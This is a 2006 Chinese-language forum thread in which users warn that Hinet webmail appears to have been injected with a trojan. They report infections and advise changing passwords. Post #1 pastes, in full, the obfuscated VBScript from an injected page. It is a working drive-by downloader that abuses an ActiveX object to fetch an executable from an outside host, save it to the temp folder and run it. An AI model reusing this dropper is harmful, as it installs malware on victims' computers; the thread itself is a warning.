|
|
|
#1
2006-11-23, 06:55 PM
|
||||
|
||||
請留意Hinet webmail
剛登入Hinet webmail,發現嚴重延遲現象!
左下角狀態列不段呼叫其他來源網址,第一直覺Hinet webmail被坎入側錄程式。 不曉得各位也是如此嗎? 呼叫外在網址概有3~4個,剛好奇先作局部錄影(影片晚點轉檔放上來) 其中一呼叫網址 www.c h q 9 9 9 . n e t /wm.htm (請用FlashGet下載本機,Editplus打開,勿直接點選,風險自負) 內頁使用語法,有人看得懂嗎? 代碼:
<html> <script language="VBScript"> function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function t="97,97,61,34,111,98,106,101,99,116,34,13,10,98,98,61,34,99,108,115,105,100,58,34,13,10,99,99,61,34,66,68,57,54,67,53,53,54,45,34,13,10,100,100,61,34,54,53,65,51,45,34,13,10,101,101,61,34,49,49,68,48,45,34,13,10,102,102,61,34,57,56,51,65,45,34,13,10,106,106,61,34,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,104,104,61,34,77,105,99,114,111,115,111,102,116,46,34,13,10,105,105,61,34,88,77,76,72,84,84,80,34,13,10,103,103,61,34,83,99,114,105,112,116,105,110,103,46,34,13,10,107,107,61,34,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,13,10,77,121,61,34,83,104,101,108,108,46,34,13,10,89,117,121,85,61,34,65,112,112,108,105,99,97,116,105,111,110,34,13,10,81,81,56,49,51,57,57,55,55,51,61,34,111,112,101,110,34,13,10,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,100,108,32,61,34,104,116,116,112,58,47,47,119,119,119,46,99,104,113,57,57,57,46,110,101,116,47,98,101,97,114,46,101,120,101,34,10,112,97,116,104,32,61,34,67,58,92,92,65,85,84,48,69,88,69,67,46,67,79,77,34,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,97,97,41,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,98,98,43,99,99,43,100,100,43,101,101,43,102,102,43,106,106,13,10,115,116,114,61,104,104,43,105,105,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,13,10,97,49,61,34,65,100,111,34,13,10,97,50,61,34,100,98,46,34,13,10,97,51,61,34,83,116,114,34,13,10,97,52,61,34,101,97,109,34,13,10,115,116,114,49,61,97,49,38,97,50,38,97,51,38,97,52,13,10,115,116,114,53,61,115,116,114,49,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,100,108,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,103,103,43,107,107,44,34,34,41,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,13,10,112,97,116,104,61,32,70,46,66,117,105,108,100,80,97,116,104,40,112,97,116,104,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,112,97,116,104,44,50,13,10,83,46,99,108,111,115,101,13,10,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,77,121,43,89,117,121,85,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,112,97,116,104,44,34,34,44,34,34,44,81,81,56,49,51,57,57,55,55,51,44,48" i=t execute(rechange(I)) </script> </html> 
|
|
#2
2006-11-23, 07:24 PM
|
||||
|
||||
錄影下來檔案不大,請直接看.avi
分別使用IE & Firefox,登入二個Hinet mail帳號,狀態列的狀態 http://123.tw/hinet_0000.avi http://123.tw/hinet_0001.avi http://123.tw/hinet_0002.avi
|
|
#3
2006-11-23, 08:55 PM
|
|||
|
|||
|
我在大陸這邊從昨晚到今天,原本正常的webmail變的幾乎無法登入。
|
|
#4
2006-11-23, 09:43 PM
|
|||
|
|||
|
那一串數字轉成文字, 確定是植入木馬的動作,
詳見 : http://news.hackhome.com/html/wlcl/m...804/50643.html
|
|
#6
2006-11-23, 11:32 PM
|
|||
|
|||
|
我也中了,卡巴一直掛點。
改用NB上線,連結舊版webmail變更密碼中。
|
|
#8
2006-11-23, 11:55 PM
|
|||
|
|||
|
|
|
#9
2006-11-24, 06:51 AM
|
||||
|
||||
|
請問一下各位電腦中是不是有裝哪些防木馬的軟體
|
|
#10
2006-11-24, 12:10 PM
|
|||
|
|||
|
我用的是KIS 6,正在期待大陸這邊出的優惠專案。
今天hinet webmail首頁有快一點,但是輸入密碼後,登入畫面會跳出空白畫面,應該是被這邊檔掉了。 至於有用過webmail的人,個人建議改一下密碼吧,比較妥當一點。
|
